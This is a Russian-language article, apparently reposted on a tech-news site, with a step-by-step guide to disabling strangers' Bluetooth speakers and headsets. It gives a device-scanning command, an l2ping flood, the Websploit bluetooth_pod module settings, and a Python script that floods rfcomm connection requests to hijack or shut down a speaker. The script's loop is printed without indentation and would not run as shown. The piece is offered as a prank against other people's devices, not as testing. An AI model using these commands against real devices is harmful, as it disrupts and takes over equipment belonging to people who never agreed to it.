DoS на Bluetooth. Разбираем трюк, который поможет отключить чужую колонку

DoS на Bluetooth. Разбираем трюк, который поможет отключить чужую колонку

На свете существует не так много вещей, которые бесят практически всех без исключения. Это весенне-осенняя слякоть, летнее отключение горячей воды и школьники с переносными Bluetooth-колонками. И если с первыми двумя стихийными бедствиями сделать практически ничего нельзя, то с третьим вполне можно бороться, причем почти без криминала. Как? Об этом и поговорим.

Если современные Wi-Fi-роутеры способны фильтровать нежелательные пакеты, то большинство адаптеров Bluetooth, мягко говоря, туповаты. Им по большому счету безразлично, какой пакет и какого объема, а уж тем более сколько этих пакетов ты пришлешь. Поэтому нам не составляет абсолютно никакого труда увеличить в Linux информационный объем пакета ping до огромного значения, а потом отослать этих пакетов на девайс с Bluetooth, скажем, 1000 штук.

Теперь по порядку. Для начала нам нужно найти подходящие устройства в зоне досягаемости. Для этого используем команду

$ hcitool scan

В результате этой нехитрой манипуляции ты получишь список доступных устройств с Bluetooth с их MAC-адресами. Если твоя система не видит адаптер Bluetooth, то я рекомендую поставить один из менеджеров Bluetooth для Linux. В Kali лично мне подошел gnome-bluetooth, который можно установить следующей командой:

$ apt-get install gnome-bluetooth

Еще можно воспользоваться утилитой blueman:

$ apt-get install blueman

Получив список потенциальных жертв, можно расправиться с их синезубыми девайсами несколькими способами. Рассмотрим каждый по отдельности.

Первый способ: l2ping

Воспользуемся такой командой:

$ l2ping -i hci0 -s <packet value> -f <MAC_address>

Она сгенерирует пакеты указанного тобой в параметре <packet value> объема и будет отсылать эти пакеты на MAC-адрес, записанный в качестве параметра <MAC_address> . В конце концов ты увидишь такую картину: в терминале время отклика будет постепенно увеличиваться, а на атакуемом устройстве, скорее всего, просто отключится Bluetooth. Через какое-то время он все равно включится, но музыка прервется, и некоторое удовлетворение будет получено.

INFO

Такая схема очень хорошо работает, когда атакуемое устройство (к примеру, телефон) подключено к гарнитуре или колонке по Bluetooth. После атаки эти два устройства не смогут соединиться друг с другом.

Второй способ: Websploit

Существует более элегантный и удобный способ заглушить колонку, из которой доносятся жизнерадостные звуки рэпа. Запускаем утилиту Websploit:

$ websploit

Набираем в консоли команду

$ show modules

Она продемонстрирует нам все модули, которые работают с этой утилитой. Там есть множество компонентов, работающих с Wi-Fi, но нас интересует конкретно модуль bluetooth/bluetooth_pod:

$ use bluetooth/bluetooth_pod

Теперь нужно настроить все параметры и указать сведения об атакуемом устройстве:

$ show options
$ set bdaddr <MAC_address>

Чтобы точно и наверняка угробить Bluetooth, мы изменим размер отсылаемого пакета:

$ set size 999

Все подготовительные действия завершены, можем запускать нашу «машину для убийств»:

$ run

На выходе мы увидим абсолютно похожую картину: пинги становятся дольше, а музыка прерывается. Красота!

Эти два способа будут работать практически с любыми блютусными колонками, гарнитурами и прочими похожими устройствами. Просто потому, что производители не выпускают для них новые прошивки, способные фильтровать входящие пакеты. Так что, если у тебя есть ноутбук с «Линуксом» на борту, ты точно можешь назвать себя грозой портативных колонок.

Если колонка справляется с атакой, можно попробовать отправить пакеты на сам телефон, к которому она подключена. Лично я тестировал этот метод на довольно мощной портативной колонке (JBL Xtreme), и она более-менее справлялась с нагрузкой. Но дешевые китайские поделки такая атака вырубает на раз.

Про готовые джаммеры

В интернете продаются любопытные товары, среди которых можно найти и глушилки частот. Стоят они обычно приличных денег и предоставляют разные возможности. Одни могут валить практически все сигналы мобильной сети, Wi-Fi и Bluetooth разом, а другие не справятся и с H+.

Если ты считаешь, что тебе действительно необходим подобный товар, то перед его приобретением настоятельно рекомендую ознакомиться с действующим законодательством. В России покупать и продавать глушилки не запрещено, однако если ты решишь воспользоваться ей, то необходима регистрация устройства в ГКРЧ. Если тебя поймают на использовании незарегистрированного девайса, то, скорее всего, оштрафуют по статье 13.4 КоАП РФ. Штраф для физических лиц на сегодняшний день составляет 500 рублей, для юридических — до 10 тысяч.

Подключаемся к чужому девайсу

Как мы уже знаем, примитивные колонки и гарнитуры почти никогда не фильтруют пакеты, которые мы им отправляем. Но что будет, если отослать такому девайсу не просто пакет с данными для проверки связи (ping), а пакет с запросом на подключение к устройству? И не один.

Не все производители подобных гарнитур позаботились о защите от переполнения буфера. Если все пакеты становятся в очередь, то что произойдет, когда складировать запросы уже будет некуда? Колонка попытается выполнить команду и при этом очистить буфер.

Поэтому мы используем стандартный протокол обмена данными по Вluetooth — rfcomm. Но так как сама утилита, контролирующая протокол, не позволит нам отправить тысячу таких запросов, мы напишем небольшой скрипт на Python, который автоматизирует процесс.

#!/usr/bin/env python
import subprocess
cmd=['rfcomm', 'connect', '<MAC_address>', '1']
for i in range(0, 1001):
subprocess.call(cmd)
print('Connecting...')

Перед запуском скрипта нам нужно узнать MAC-адрес устройства. Для этого используем уже знакомую команду hcitool scan , а полученный адрес вставляем в скрипт вместо <MAC_address> . Теперь сохраняем скрипт и запускаем его:

$ python <FileName>

Сработает скрипт или нет, зависит от модели атакуемого девайса, вернее, от скорости заполнения буфера. Если буфер успеет забиться до его очистки, то команда будет выполнена, и тогда мы подключимся к колонке одновременно с основным пользователем. Если же буфер очистится, то ничего не получится и придется перезапустить скрипт.

Если наш сценарий успешно выполнен, мы можем устроить свою дискотеку или вырубить устройство. Мои личные эксперименты с колонкой JBL Xtreme привели к ее отключению, а вот JBL Flip 2 когда-то удавалось и перехватывать (сейчас ее под рукой нет).

Источник

0

Автор публикации

не в сети 1 день

Андрей Маргулис

334
С организацией DDoS атак завязал.
Выкладываю новости технологий и интересные статьи с темной стороны интернета.
32 года
День рождения: 14 Мая 1991
Комментарии: 117Публикации: 3001Регистрация: 12-12-2015
Понравилась статья? Поделиться с друзьями:
РЭНБИ - Europe
Авторизация
*
*
Регистрация
*
*
*
Генерация пароля